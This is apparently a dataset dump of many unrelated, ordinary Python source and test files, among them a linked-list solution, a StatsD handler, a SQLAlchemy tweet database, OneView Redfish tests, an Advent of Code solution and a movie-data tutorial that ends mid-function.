content
stringlengths 5
1.05M
|
|---|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def reorderList(self, head: ListNode) -> None:
"""
Do not return anything, modify head in-place instead.
"""
if ( head == None or head.next == None or head.next.next == None ):
return
else:
fast, slow = head, head
# split
while fast and fast.next:
fast = fast.next.next
slow = slow.next
# rev
Second = slow.next
pre = None
slow.next = None
while Second:
nextN = Second.next
Second.next = pre
pre = Second
Second = nextN
# comp
while pre :
nextN = pre
pre = pre.next
nextN.next = head.next
head.next = nextN
head = head.next.next
|
import allure
import pytest
from tests.helpers import url_path_for
@allure.feature('Утилиты')
@allure.story('Тестирование внутренних утилит')
@allure.label('layer', 'unit')
@pytest.mark.parametrize(
'name,query_params,path_params,expected',
[
('get_list_of_shares', {}, {}, '/api/shares/'),
('get_list_of_shares', {'limit': 10}, {}, '/api/shares/?limit=10'),
('get_share', {}, {'ticker': 'TSLA'}, '/api/shares/TSLA/'),
('get_share', {'limit': 10}, {'ticker': 'TSLA'}, '/api/shares/TSLA/?limit=10'),
],
)
def test_url_path_for(name, query_params, path_params, expected):
assert url_path_for(name, query_params=query_params, **path_params) == expected
|
from sklearn.datasets import make_circles
from tensorflow.keras.layers import Dense, BatchNormalization, GaussianNoise
from tensorflow.keras.models import Sequential
from tensorflow.keras.regularizers import l2
from tensorflow.keras.optimizers import SGD
from tensorflow.keras.callbacks import EarlyStopping
from matplotlib import pyplot
X, y = make_circles(n_samples=1000, noise=0.1, random_state=1)
# print(X, y)
n_train = 500
trainX, testX = X[:n_train, :], X[n_train:, :]
trainy, testy = y[:n_train], y[n_train:]
model = Sequential()
model.add(Dense(50, input_dim=2, activation="relu", kernel_regularizer=l2(0.01)))
model.add(BatchNormalization())
# model.add(GaussianNoise(stddev=0.01))
model.add(Dense(1, activation="sigmoid"))
opt = SGD(lr=.01, momentum=0.9)
model.compile(loss="binary_crossentropy", optimizer=opt, metrics=['accuracy'])
es = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=200)
history = model.fit(trainX,
trainy,
validation_data=(testX, testy),
epochs=1000,
batch_size=len(trainX),
verbose=1, callbacks=[es])
_, train_acc = model.evaluate(trainX, trainy, verbose=1)
_, test_acc = model.evaluate(testX, testy, verbose=1)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
pyplot.subplot(211)
pyplot.title('Cross-Entropy Loss', pad=-40)
pyplot.plot(history.history['loss'], label='train')
pyplot.plot(history.history['val_loss'], label='test')
pyplot.legend()
pyplot.grid()
# plot accuracy learning curves
pyplot.subplot(212)
pyplot.title('Accuracy', pad=-40)
pyplot.plot(history.history['accuracy'], label='train')
pyplot.plot(history.history['val_accuracy'], label='test')
pyplot.legend()
pyplot.grid()
pyplot.show()
|
from training_functions import *
|
from Sensors.LIDAR.LIDAR_Interface import LIDAR_Interface
from Sensors.LIDAR.Utils import Ray, Stack
from math import cos, sin, pi, floor
import pygame
import time
screen_x = 400
screen_y = 400
lidar = LIDAR_Interface(loc="/dev/ttyUSB0")
def main():
global screen_y, screen_x, lidar
lidar.start()
pygame.init()
screen = pygame.display.set_mode((screen_x, screen_y))
pygame.mouse.set_visible(False)
screen.fill(pygame.Color(0,0,0))
dur = time.perf_counter()
try:
while True:
current_scan = lidar.pop_recent_scan
if current_scan is not None:
for i in range(current_scan.__len__()):
rads = current_scan[i].theta * pi / 180.0
x = current_scan[i].radius/25 * cos(rads)
y = current_scan[i].radius/25 * sin(rads)
point = (int(x + (screen_x / 2)), int(y + (screen_y/2)))
screen.set_at(point, pygame.Color(255,255,255))
#print("Point", i)
#print("Angle:", current_scan[i].theta, "Radius:", current_scan[i].radius)
pygame.display.update()
print("time", time.perf_counter() - dur)
dur = time.perf_counter()
except KeyboardInterrupt:
lidar.stop_thread()
lidar.stop_motor()
lidar.stop_sensor()
lidar.exit_func()
if __name__ == "__main__":
main()
|
from app.core.error_success_data_result import ErrorDataResult
from app.core.messages import Messages
from app.models.log_model import LogModel
from app.models.credit_card_model import CreditCardModel
from app.dataAccess.log_data_dal import LogDataDal
import simplejson as json
from datetime import datetime
class LogDataManager:
def __init__(self):
self.log_data_dal = LogDataDal()
def create_log(self, log_type, userId, action, message):
try:
information = f"userID={userId}, action={action}, message={message}"
log_info_model = LogModel(log_type=log_type,
created_at=str(
datetime.now()),
information=information)
log_model_dict = log_info_model.__dict__
jsonStr = json.dumps(log_model_dict)
self.insert_log(log_model_dict)
print(jsonStr)
except Exception as err:
return ErrorDataResult(message=err.__doc__)
def insert_log(self, data):
try:
self.log_data_dal.insert_data_log(data)
except Exception as err:
return ErrorDataResult(message=err.__doc__)
|
# -*- coding: utf-8 -
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
# Copyright 2011 Cloudant, Inc.
import re
import six
import math
import time
import logging
import threading
import bucky2.udpserver as udpserver
log = logging.getLogger(__name__)
class StatsDHandler(threading.Thread):
def __init__(self, queue, flush_time=10):
super(StatsDHandler, self).__init__()
self.daemon = True
self.queue = queue
self.lock = threading.Lock()
self.timers = {}
self.gauges = {}
self.counters = {}
self.flush_time = flush_time
self.key_res = (
(re.compile("\s+"), "_"),
(re.compile("\/"), "-"),
(re.compile("[^a-zA-Z_\-0-9\.]"), "")
)
def run(self):
while True:
time.sleep(self.flush_time)
stime = int(time.time())
with self.lock:
num_stats = self.enqueue_timers(stime)
num_stats += self.enqueue_counters(stime)
num_stats += self.enqueue_gauges(stime)
self.enqueue("stats.numStats", num_stats, stime)
def enqueue(self, name, stat, stime):
# No hostnames on statsd
self.queue.put((None, name, stat, stime))
def enqueue_timers(self, stime):
ret = 0
iteritems = self.timers.items() if six.PY3 else self.timers.iteritems()
for k, v in iteritems:
# Skip timers that haven't collected any values
if not v:
continue
v.sort()
pct_thresh = 90
count = len(v)
vmin, vmax = v[0], v[-1]
mean, vthresh = vmin, vmax
if count > 1:
thresh_idx = int(math.floor(pct_thresh / 100.0 * count))
v = v[:thresh_idx]
vthresh = v[-1]
vsum = sum(v)
mean = vsum / float(len(v))
self.enqueue("stats.timers.%s.mean" % k, mean, stime)
self.enqueue("stats.timers.%s.upper" % k, vmax, stime)
t = int(pct_thresh)
self.enqueue("stats.timers.%s.upper_%s" % (k, t), vthresh, stime)
self.enqueue("stats.timers.%s.lower" % k, vmin, stime)
self.enqueue("stats.timers.%s.count" % k, count, stime)
self.timers[k] = []
ret += 1
return ret
def enqueue_gauges(self, stime):
ret = 0
iteritems = self.gauges.items() if six.PY3 else self.gauges.iteritems()
for k, v in iteritems:
self.enqueue("stats.gauges.%s" % k, v, stime)
ret += 1
return ret
def enqueue_counters(self, stime):
ret = 0
iteritems = self.counters.items() if six.PY3 else self.counters.iteritems()
for k, v in iteritems:
self.enqueue("stats.%s" % k, v / self.flush_time, stime)
self.enqueue("stats_counts.%s" % k, v, stime)
self.counters[k] = 0
ret += 1
return ret
def handle(self, data):
# Adding a bit of extra sauce so clients can
# send multiple samples in a single UDP
# packet.
for line in data.splitlines():
self.line = line
if not line.strip():
continue
self.handle_line(line)
def handle_line(self, line):
bits = line.split(":")
key = self.handle_key(bits.pop(0))
if not bits:
self.bad_line()
return
# I'm not sure if statsd is doing this on purpose
# but the code allows for name:v1|t1:v2|t2 etc etc.
# In the interest of compatibility, I'll maintain
# the behavior.
for sample in bits:
if not "|" in sample:
self.bad_line()
continue
fields = sample.split("|")
if fields[1] == "ms":
self.handle_timer(key, fields)
elif fields[1] == "g":
self.handle_gauge(key, fields)
else:
self.handle_counter(key, fields)
def handle_key(self, key):
for (rexp, repl) in self.key_res:
key = rexp.sub(repl, key)
return key
def handle_timer(self, key, fields):
try:
val = float(fields[0] or 0)
with self.lock:
self.timers.setdefault(key, []).append(val)
except:
self.bad_line()
def handle_gauge(self, key, fields):
valstr = fields[0] or "0"
try:
val = float(valstr)
except:
self.bad_line()
return
delta = valstr[0] in ["+", "-"]
with self.lock:
if delta and key in self.gauges:
self.gauges[key] = self.gauges[key] + val
else:
self.gauges[key] = val
def handle_counter(self, key, fields):
rate = 1.0
if len(fields) > 2 and fields[2][:1] == "@":
try:
rate = float(fields[2][1:].strip())
except:
rate = 1.0
try:
val = int(float(fields[0] or 0) / rate)
except:
self.bad_line()
return
with self.lock:
if key not in self.counters:
self.counters[key] = 0
self.counters[key] += val
def bad_line(self):
log.error("StatsD: Invalid line: '%s'", self.line.strip())
class StatsDServer(udpserver.UDPServer):
def __init__(self, queue, cfg):
super(StatsDServer, self).__init__(cfg.statsd_ip, cfg.statsd_port)
self.handler = StatsDHandler(queue, flush_time=cfg.statsd_flush_time)
def run(self):
self.handler.start()
super(StatsDServer, self).run()
if six.PY3:
def handle(self, data, addr):
self.handler.handle(data.decode())
if not self.handler.is_alive():
return False
return True
else:
def handle(self, data, addr):
self.handler.handle(data)
if not self.handler.is_alive():
return False
return True
|
import pynlpir
import re
pynlpir.open()
s = '不让我上桌吃饭我还不会自己抢吗![doge][doge][doge](投稿:@还没怀上的葛一他麻麻)http://t.cn/RqKTebK '
stop = [line.strip() for line in open('ad/stop.txt', 'r', encoding='utf-8').readlines()] # 停用词
print(list(set(pynlpir.segment(s, pos_tagging=False))))
#['cn', '全民', 'R68kD0I', '饮酒', '醉', ' ', '一人', 'K', 't', '甜', '听听', '歌', '一首歌', '♥', 'http', '酸', '唱']
#['听听', '全民', '点', '@全民K歌', '首', ' ', '酸', 'http://t.cn/R68kD0I', '饮酒', '唱', '歌', '醉', 'K', '♥有点', '甜']
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# FILE: ExampleTweetsDB.py
#
# An object for managing the fitness tweet collection
#
# Copyright by Author. All rights reserved. Not for reuse without
# express permissions.
#
#
from sochi.data.db.base.TweetsDB import TweetsDB
from sochi.data.db.sochi.ExampleTweetObj import ExampleTweetObj
from sochi.data.db.sochi.ExampleUserObj import ExampleUserObj
from sochi.data.db.sochi.ExampleUserMetaObj import ExampleUserMetaObj
from sochi.data.db.sochi.ExampleFollowerObj import ExampleFollowerObj
from sochi.data.db.sochi.ExampleFriendObj import ExampleFriendObj
from sqlalchemy.orm import mapper, class_mapper
from sqlalchemy.orm.exc import UnmappedClassError
import sys
class ExampleTweetsDB(TweetsDB):
def __init__(self, config=None):
TweetsDB.__init__(self, config=config)
try:
self.tweet_mapper = class_mapper(ExampleTweetObj)
except UnmappedClassError:
self.tweet_mapper = mapper(ExampleTweetObj,self.tweet_table)
try:
self.user_mapper = class_mapper(ExampleUserObj)
except UnmappedClassError:
self.user_mapper = mapper(ExampleUserObj,self.user_table)
try:
self.user_meta_mapper = class_mapper(ExampleUserMetaObj)
except UnmappedClassError:
self.user_meta_mapper = mapper(ExampleUserMetaObj,self.user_meta_table)
try:
self.friend_mapper = class_mapper(ExampleFriendObj)
except UnmappedClassError:
self.friend_mapper = mapper(ExampleFriendObj,self.friends_table)
try:
self.follower_mapper = class_mapper(ExampleFollowerObj)
except UnmappedClassError:
self.follower_mapper = mapper(ExampleFollowerObj,self.followers_table)
##
# New object creation routines
##
## Create "tweet" objects and records
def new_tweet_table_item(self, rec=None):
nto = ExampleTweetObj()
if( rec ):
return nto.from_dict(rec)
return nto
def tweet_table_item_to_dict(self, tto=None):
rec = {}
if( tto ):
rec = tto.to_dict()
return rec
## Create "user" objects and records
def new_user_table_item(self, rec=None):
uto = ExampleUserObj()
if( rec ):
return uto.from_dict(rec)
return uto
def user_table_item_to_dict(self, uto=None):
rec = {}
if( uto ):
rec = uto.to_dict()
return rec
## Create "user_meta" objects and records
def new_user_meta_table_item(self, rec=None):
umto = ExampleUserMetaObj()
if( rec ):
return umto.from_dict(rec)
return umto
def user_meta_table_item_to_dict(self, umto=None):
rec = {}
if( umto ):
rec = umto.to_dict()
return rec
## Create "friend" objects and records
def new_friend_table_item(self, rec=None):
nf = ExampleFriendObj()
if( rec ):
return nf.from_dict(rec)
return nf
def friend_table_item_to_dict(self, nf=None):
rec = {}
if( nf ):
rec = nf.to_dict()
return rec
## Create "follower" objects and records
def new_follower_table_item(self, rec=None):
nf = ExampleFollowerObj()
if( rec ):
return nf.from_dict(rec)
return nf
def follower_table_item_to_dict(self, nf=None):
rec = {}
if( nf ):
rec = nf.to_dict()
return rec
##
# straight forward query types
##
##
## Query the tweet table
##
def query_tweet_table_by_tweet_id(self, tid):
t = self.session.query(ExampleTweetObj).filter(ExampleTweetObj.tweet_id==tid).all()
return t
def query_tweet_table_by_username(self, uname=None, start_date=None, end_date=None):
q = self._tweet_table_date_range(start_date=start_date, end_date=end_date)
q = q.filter(ExampleTweetObj.from_user==uname)
tlist = q.all()
return tlist
def query_tweet_table_by_user_id(self, uid=None, start_date=None, end_date=None):
q = self._tweet_table_date_range(start_date=start_date, end_date=end_date)
q = q.filter(ExampleTweetObj.from_user_id==uid)
tlist = q.all()
return tlist
def query_tweet_table_by_tweet_substr(self, substr=None, start_date=None, end_date=None):
qtext = "%"+substr+"%"
q = self._tweet_table_date_range(start_date=start_date, end_date=end_date)
q = q.filter(ExampleTweetObj.tweet_text.like(qtext))
tlist = q.all()
return tlist
def _tweet_table_date_range(self, start_date=None, end_date=None):
query = self.session.query(ExampleTweetObj)
if( start_date and end_date ):
query = query.filter(ExampleTweetObj.created_at>=start_date)
query = query.filter(ExampleTweetObj.created_at<end_date)
elif( start_date ):
query = query.filter(ExampleTweetObj.created_at>=start_date)
elif( end_date ):
query = query.filter(ExampleTweetObj.created_at<end_date)
else:
pass
return query
##
## Query the user table
##
def query_user_table_by_record_id(self, rid=None, rid2=None):
if( rid2 ):
q = self.session.query(ExampleUserObj).filter(ExampleUserObj.rid>=rid)
tlist = q.filter(ExampleUserObj.rid<rid2).all()
else:
tlist = self.session.query(ExampleUserObj).filter(ExampleUserObj.rid==rid).all()
return tlist
def query_user_table_by_fullname(self, sname):
tlist = self.session.query(ExampleUserObj).filter(ExampleUserObj.screen_name==sname).all()
return tlist
def query_user_table_by_screenname(self, sname):
tlist = self.session.query(ExampleUserObj).filter(ExampleUserObj.screen_name==sname).all()
return tlist
def query_user_table_by_username(self, uname):
tlist = self.session.query(ExampleUserObj).filter(ExampleUserObj.user_name==uname).all()
return tlist
def query_user_table_by_user_id(self, uid):
tlist = self.session.query(ExampleUserObj).filter(ExampleUserObj.user_id==uid).all()
return tlist
##
## Query the user_meta table
##
def query_user_meta_table_by_fullname(self, sname):
tlist = self.session.query(ExampleUserMetaObj).filter(ExampleUserMetaObj.screen_name==sname).all()
return tlist
def query_user_meta_table_by_screenname(self, sname):
tlist = self.session.query(ExampleUserMetaObj).filter(ExampleUserMetaObj.screen_name==sname).all()
return tlist
def query_user_meta_table_by_username(self, uname):
tlist = self.session.query(ExampleUserMetaObj).filter(ExampleUserMetaObj.user_name==uname).all()
return tlist
def query_user_meta_table_by_user_id(self, uid):
tlist = self.session.query(ExampleUserMetaObj).filter(ExampleUserMetaObj.user_id==uid).all()
return tlist
##
## Query the friends table
##
def query_friends_by_username(self, uname=None, fname=None):
q = self.session.query(ExampleFriendObj).filter(ExampleFriendObj.user==uname)
if( fname ):
q = q.filter(ExampleFriendObj.friend==fname)
flist = q.all()
return flist
def query_friends_by_user_id(self, uid=None, fid=None):
q = self.session.query(ExampleFriendObj).filter(ExampleFriendObj.user_id==uid)
if( fid ):
q = q.filter(ExampleFriendObj.friend_id==fid)
flist = q.all()
return flist
##
## Query the followers table
##
def query_followers_by_username(self, uname=None, fname=None):
q = self.session.query(ExampleFollowerObj).filter(ExampleFollowerObj.user==uname)
if( fname ):
q = q.filter(ExampleFollowerObj.follower==fname)
flist = q.all()
return flist
def query_followers_by_user_id(self, uid=None, fid=None):
q = self.session.query(ExampleFollowerObj).filter(ExampleFollowerObj.user_id==uid)
if( fid ):
q = q.filter(ExampleFollowerObj.follower_id==fid)
flist = q.all()
return flist
|
from piri.functions import apply_slicing
def test_no_value_is_ok():
"""When value is None we get a Success(None)."""
assert apply_slicing(None, {}) is None
def test_slice_middle_of_value():
"""Test that we can get a value in middle of string."""
assert apply_slicing('test', {'from': 1, 'to': 3}) == 'es'
def test_slice_middle_to_end():
"""Test that we can slice from middle to end of value."""
assert apply_slicing('test', {'from': 1}) == 'est'
def test_slice_start_to_middle():
"""Test that we can slice from start to middle."""
assert apply_slicing('test', {'from': 0, 'to': 3}) == 'tes'
def test_slice_start_to_end():
"""Test that we can slice from start to end."""
assert apply_slicing('test', {'from': 0, 'to': None}) == 'test'
def test_slice_negative_from():
"""Test that a negative from value starts cutting at the end minus from."""
assert apply_slicing('012345', {'from': -2}) == '45'
def test_slice_negative_to():
"""Test that a negative to value ends cut at end minus to."""
assert apply_slicing('01234', {'from': 0, 'to': -2}) == '012'
|
import serial
from serial.tools import list_ports
import time
class Ares:
def __init__(self, robot, camera, info):
self.robot = robot
self.camera = camera
self.max_speed = info['max_speed']
self.max_rotation = info['max_rotation']
self.k = 1
def compute_vector(self, target, area, x, hr):
"""
From given Theia data, compute desired movement vector.
:param target: The target area of the object.
:param area: The current area of the object..
:param x: The x-center of the target.
:param hr: Head rotation.
:return: (forward, rotation).
"""
# Compute absolute r.
dr = (x - 0.5 * self.camera.width) * -1
r = dr / self.camera.width * (self.camera.fx / 2)
r += hr
# Get range bounds.
servo = self.robot.head[0]
low = servo.left_bound - self.camera.fx / 2
high = servo.right_bound + self.camera.fx / 2
mid = (low + high) / 2
delta = abs(high - mid)
# Compute magnitude of r.
if abs(r - mid) <= 5:
# Close enough to target.
rotation = 0
elif r > mid:
# Left turn.
rotation = abs(self.max_rotation * r / delta)
else:
# Right turn.
rotation = abs(self.max_rotation * r / delta)
rotation *= -1
if rotation > 0.5:
# Too much rotation, perform in place turn.
forward = 0
else:
v = self.max_speed - self.max_speed * area / target
if abs(v) < 0.5:
# Too slow. No need to move.
forward = 0
else:
forward = v
# Round because rounded things are better.
rotation = round(rotation, 2)
forward = round(forward, 2)
return forward, rotation
class RFID:
def __init__(self, port=None):
"""
RFID reader class for SparkFun's USB RFID Reader.
:param port: The virtual port number.
"""
if port is not None:
self.port = port
else:
ports = list(list_ports.grep(r'(?i)0403'))
if len(ports) == 1:
self.port = ports[0][0]
else:
raise Exception('Unable to determine RFID reader port automatically. Please specify.')
# Start a connection using pyserial.
try:
self.usb = serial.Serial(self.port, timeout=0)
except:
raise Exception('Unable to connect to RFID reader at %s.' % self.port)
def read(self):
"""
Reads the buffer. Returns immediately.
:param timeout: Maximum time to wait.
:return: Returns a 12 character RFID code, or None if not available.
"""
if self.usb.inWaiting() >= 16:
data = self.usb.read(size=16)
data = data.decode()
# Assert for debugging verification.
assert(data[0] == '\x02')
assert(data[13:] == '\r\n\x03')
rfid = data[1:13]
return rfid
else:
return None
|
from .block import *
from .core import *
from .external import *
from .pipeline import *
from .source import *
from .transform import *
|
"""Base word embedding"""
import torch
import torch.nn as nn
import os
from bootleg.utils import logging_utils
class BaseWordEmbedding(nn.Module):
"""
Base word embedding class. We split the word embedding from the sentence encoder, similar to BERT.
Attributes:
pad_id: id of the pad word index
"""
def __init__(self, args, main_args, word_symbols):
super(BaseWordEmbedding, self).__init__()
self.logger = logging_utils.get_logger(main_args)
self._key = "word"
self.pad_id = word_symbols.pad_id
def freeze_params(self):
for name, param in self.named_parameters():
param.requires_grad = False
self.logger.debug(f'Freezing {name}')
return
# This mask is for downstream pytorch multiheadattention
# This assumes that TRUE means MASK (aka IGNORE). For the sentence embedding, the mask therefore is if an index is equal to the pad id
# Note: This mask cannot be used for a BERT model as they use the reverse mask.
def get_downstream_mask(self, word_indices):
return word_indices == self.pad_id
def forward(self, word_indices):
raise ValueError("Not implemented.")
def get_dim(self):
raise ValueError("Not implemented.")
def get_key(self):
raise ValueError("Not implemented.")
|
# -*- coding: utf-8 -*-
# Copyright (2017-2018) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Python libs
import json
from unittest import mock
# 3rd party libs
from flask_api import status
from hpOneView.exceptions import HPOneViewException
# Module libs
from oneview_redfish_toolkit.blueprints import manager
from oneview_redfish_toolkit.tests.base_flask_test import BaseFlaskTest
class TestManager(BaseFlaskTest):
"""Tests for Managers blueprint
Tests:
- enclosures
- know value
- not found error
- unexpected error
- blades
"""
@classmethod
def setUpClass(self):
super(TestManager, self).setUpClass()
self.app.register_blueprint(manager.manager)
#############
# Enclosure #
#############
@mock.patch.object(manager, 'g')
def test_get_enclosure_manager(
self, g):
""""Tests EnclosureManager with a known Enclosure"""
# Loading Enclosure mockup value
with open(
'oneview_redfish_toolkit/mockups/oneview/Enclosure.json'
) as f:
ov_enclosure = json.load(f)
# Loading EnclosureManager mockup result
with open(
'oneview_redfish_toolkit/mockups/redfish/EnclosureManager.json'
) as f:
rf_enclosure_manager = json.load(f)
g.oneview_client.index_resources.get_all.return_value = \
[{"category": "enclosures"}]
g.oneview_client.enclosures.get.return_value = ov_enclosure
g.oneview_client. appliance_node_information.get_version.return_value = \
{"softwareVersion": "3.00.07-0288219"}
# Get EnclosureManager
response = self.client.get(
"/redfish/v1/Managers/0000000000A66101"
)
result = json.loads(response.data.decode("utf-8"))
# Tests response
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual("application/json", response.mimetype)
self.assertEqual(rf_enclosure_manager, result)
self.assertEqual(
"{}{}".format("W/", ov_enclosure["eTag"]),
response.headers["ETag"])
@mock.patch.object(manager, 'g')
def test_get_enclosure_not_found(self, g):
"""Tests EnclosureManager with Enclosure not found"""
g.oneview_client.index_resources.get_all.return_value = \
[{"category": "enclosures"}]
g.oneview_client.enclosures.get.return_value = \
{'enclosureUri': 'invalidUri'}
e = HPOneViewException({
'errorCode': 'RESOURCE_NOT_FOUND',
'message': 'enclosure not found',
})
g.oneview_client.enclosures.get.side_effect = e
response = self.client.get(
"/redfish/v1/Managers/0000000000A66101"
)
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
self.assertEqual("application/json", response.mimetype)
@mock.patch.object(manager, 'g')
def test_enclosure_unexpected_error(self, g):
"""Tests EnclosureManager with an unexpected error"""
g.oneview_client.index_resources.get_all.return_value = \
[{"category": "enclosures"}]
g.oneview_client.enclosures.get.side_effect = Exception()
response = self.client.get(
"/redfish/v1/Managers/0000000000A66101"
)
self.assertEqual(
status.HTTP_500_INTERNAL_SERVER_ERROR,
response.status_code)
self.assertEqual("application/json", response.mimetype)
#############
# Blade #
#############
@mock.patch.object(manager, 'g')
def test_get_blade_manager(
self, g):
""""Tests BladeManager with a known Server Hardware"""
# Loading ServerHardware mockup value
with open(
'oneview_redfish_toolkit/mockups/oneview/ServerHardware.json'
) as f:
server_hardware = json.load(f)
# Loading BladeManager mockup result
with open(
'oneview_redfish_toolkit/mockups/redfish/BladeManager.json'
) as f:
blade_manager_mockup = json.load(f)
g.oneview_client.index_resources.get_all.return_value = \
[{"category": "server-hardware"}]
g.oneview_client.server_hardware.get.return_value = server_hardware
g.oneview_client. appliance_node_information.get_version.return_value = \
{"softwareVersion": "3.00.07-0288219"}
# Get BladeManager
response = self.client.get(
"/redfish/v1/Managers/30303437-3034-4D32-3230-313133364752"
)
result = json.loads(response.data.decode("utf-8"))
# Tests response
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual("application/json", response.mimetype)
self.assertEqual(blade_manager_mockup, result)
self.assertEqual(
"{}{}".format("W/", server_hardware["eTag"]),
response.headers["ETag"])
@mock.patch.object(manager, 'g')
def test_get_server_hardware_not_found(self, g):
"""Tests BladeManager with Server Hardware not found"""
g.oneview_client.index_resources.get_all.return_value = [
{"category": "server-hardware"}]
g.oneview_client.server_hardware.get.return_value =\
{'serverHardwareUri': 'invalidUri'}
e = HPOneViewException({
'errorCode': 'RESOURCE_NOT_FOUND',
'message': 'server hardware not found',
})
g.oneview_client.server_hardware.get.side_effect = e
response = self.client.get(
"/redfish/v1/Managers/30303437-3034-4D32-3230-313133364752"
)
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
self.assertEqual("application/json", response.mimetype)
@mock.patch.object(manager, 'g')
def test_server_hardware_unexpected_error(self, g):
"""Tests BladeManager with an unexpected error"""
g.oneview_client.index_resources.get_all.return_value = [
{"category": "server-hardware"}]
g.oneview_client.server_hardware.get.side_effect = Exception()
response = self.client.get(
"/redfish/v1/Managers/30303437-3034-4D32-3230-313133364752"
)
self.assertEqual(
status.HTTP_500_INTERNAL_SERVER_ERROR,
response.status_code)
self.assertEqual("application/json", response.mimetype)
|
"""
Invokable Module for CLI
python -m pcskcli
"""
from pcskcli.cli.main import cli
if __name__ == "__main__":
cli(prog_name="pcsk")
|
"""Tests for the HVV Departures integration."""
|
'''
Solution to Advent of Code, year 2021, day 5.
'''
import os
from collections import defaultdict
file = 'input.txt' # Name of the file with input data.
path = os.path.dirname(__file__) # Path to the file with input data.
file_and_path = os.path.join(path, file)
input_file = open(file_and_path, 'r')
lines= input_file.readlines()
points = defaultdict(int)
for line in lines:
line = line.replace(' -> ', ',')
coords = [int(x) for x in line.split(',')]
x1 = coords[0]
x2 = coords[2]
y1 = coords[1]
y2 = coords[3]
delta_x = x2 - x1
delta_y = y2 - y1
if delta_x != 0:
k = delta_y / delta_x
else:
k = 666
m = y1 - k * x1
print(k)
if delta_x == 0:
if (y2 > y1):
for y in range(y1, y2 + 1):
key = 'x' + str(x1) + 'y' + str(y)
points[key] += 1
else:
for y in range(y2, y1 + 1):
key = 'x' + str(x1) + 'y' + str(y)
points[key] += 1
elif delta_y == 0:
if x2 > x1:
for x in range(x1, x2 + 1):
key = 'x' + str(x) + 'y' + str(y1)
points[key] += 1
else:
for x in range(x2, x1 + 1):
key = 'x' + str(x) + 'y' + str(y1)
points[key] += 1
elif delta_x > 0:
y = y1
for x in range(x1, x2 + 1):
key = 'x' + str(x) + 'y' + str(y)
points[key] += 1
if y2 > y1:
y += 1
else:
y -= 1
elif delta_x < 0:
y = y2
for x in range(x2, x1 + 1):
key = 'x' + str(x) + 'y' + str(y)
points[key] += 1
if y2 > y1:
y -= 1
else:
y += 1
print(points)
count = 0
for value in points.values():
if value > 1:
count += 1
print(count)
|
import time
class Storage:
def __init__(self):
self.data = {}
self.time = {}
def __getitem__(self, item):
return self.data[item]
def __setitem__(self, key, value):
if key in self.data and self.data[key] == value:
self.time[key] = time.monotonic()
return
self.data[key] = value
self.time[key] = time.monotonic()
def __delitem__(self, key):
del self.data[key]
del self.time[key]
def __contains__(self, item):
return item in self.data
def __iter__(self):
self._keys = list(self.data.keys())
self._i = 0
return self
def __next__(self):
if self._i < len(self._keys):
self._i += 1
return self._keys[self._i-1]
else:
raise StopIteration
|
from django.contrib.auth.models import User
from django.urls import reverse
from rest_framework.test import APIRequestFactory, force_authenticate
from authenticator.views import ValidateTokenView
factory = APIRequestFactory()
def test_validate_token_view_post():
"""Should get a simple 200 response"""
user = User(username='test')
view = ValidateTokenView.as_view()
url = reverse('validate-token')
request = factory.post(url)
force_authenticate(request, user=user)
response = view(request)
assert response.status_code == 200
def test_validate_token_view_invalid_methods():
"""POST should be the only method allowed"""
user = User(username='test')
view = ValidateTokenView.as_view()
url = reverse('validate-token')
for method in ('get', 'put', 'patch', 'delete'):
request = getattr(factory, method)(url)
force_authenticate(request, user=user)
response = view(request)
assert response.status_code == 405
|
class Solution:
def eraseOverlapIntervals(self, intervals: List[List[int]]) -> int:
if not intervals:
return 0
count = 0
intervals.sort()
left, right = intervals[0]
for start, end in intervals[1:]:
if start < right:
count += 1
right = min(right, end)
else:
right = end
return count
|
## 1. Overview ##
f = open("movie_metadata.csv", 'r')
movie_metadata = f.read()
movie_metadata = movie_metadata.split('\n')
movie_data = []
for element in movie_metadata:
row = element.split(',')
movie_data.append(row)
print(movie_data[:5])
## 3. Writing Our Own Functions ##
def first_elts(nested_lists):
list_heads = []
for n_list in nested_lists:
list_heads.append(n_list[0])
return list_heads
movie_names = first_elts(movie_data)
print(movie_names)
## 4. Functions with Multiple Return Paths ##
def is_usa(movie):
origin_idx = 6
return True if movie[origin_idx] == "USA" else False
wonder_woman = ['Wonder Woman','Patty Jenkins','Color',141,'Gal Gadot','English','USA',2017]
wonder_woman_usa = is_usa(wonder_woman)
## 5. Functions with Multiple Arguments ##
wonder_woman = ['Wonder Woman','Patty Jenkins','Color',141,'Gal Gadot','English','USA',2017]
def is_usa(input_lst):
if input_lst[6] == "USA":
return True
else:
return False
def index_equals_str(input_lst, index, input_str):
return input_lst[index] == input_str
wonder_woman_in_color = index_equals_str(wonder_woman, 2, "Color")
## 6. Optional Arguments ##
def index_equals_str(input_lst,index,input_str):
if input_lst[index] == input_str:
return True
else:
return False
def counter(input_lst,header_row = False):
num_elt = 0
if header_row == True:
input_lst = input_lst[1:len(input_lst)]
for each in input_lst:
num_elt = num_elt + 1
return num_elt
def feature_counter(input_lst, index, input_str, header_row=False):
num_feature = 0
if header_row == True:
input_lst = input_lst[1:]
for row in input_lst:
num_feature += 1 if row[index] == input_str else 0
return num_feature
num_of_us_movies = feature_counter(movie_data, 6, "USA", True)
## 7. Calling a Function inside another Function ##
def feature_counter(input_lst, index, input_str, header_row = False):
num_elt = 0
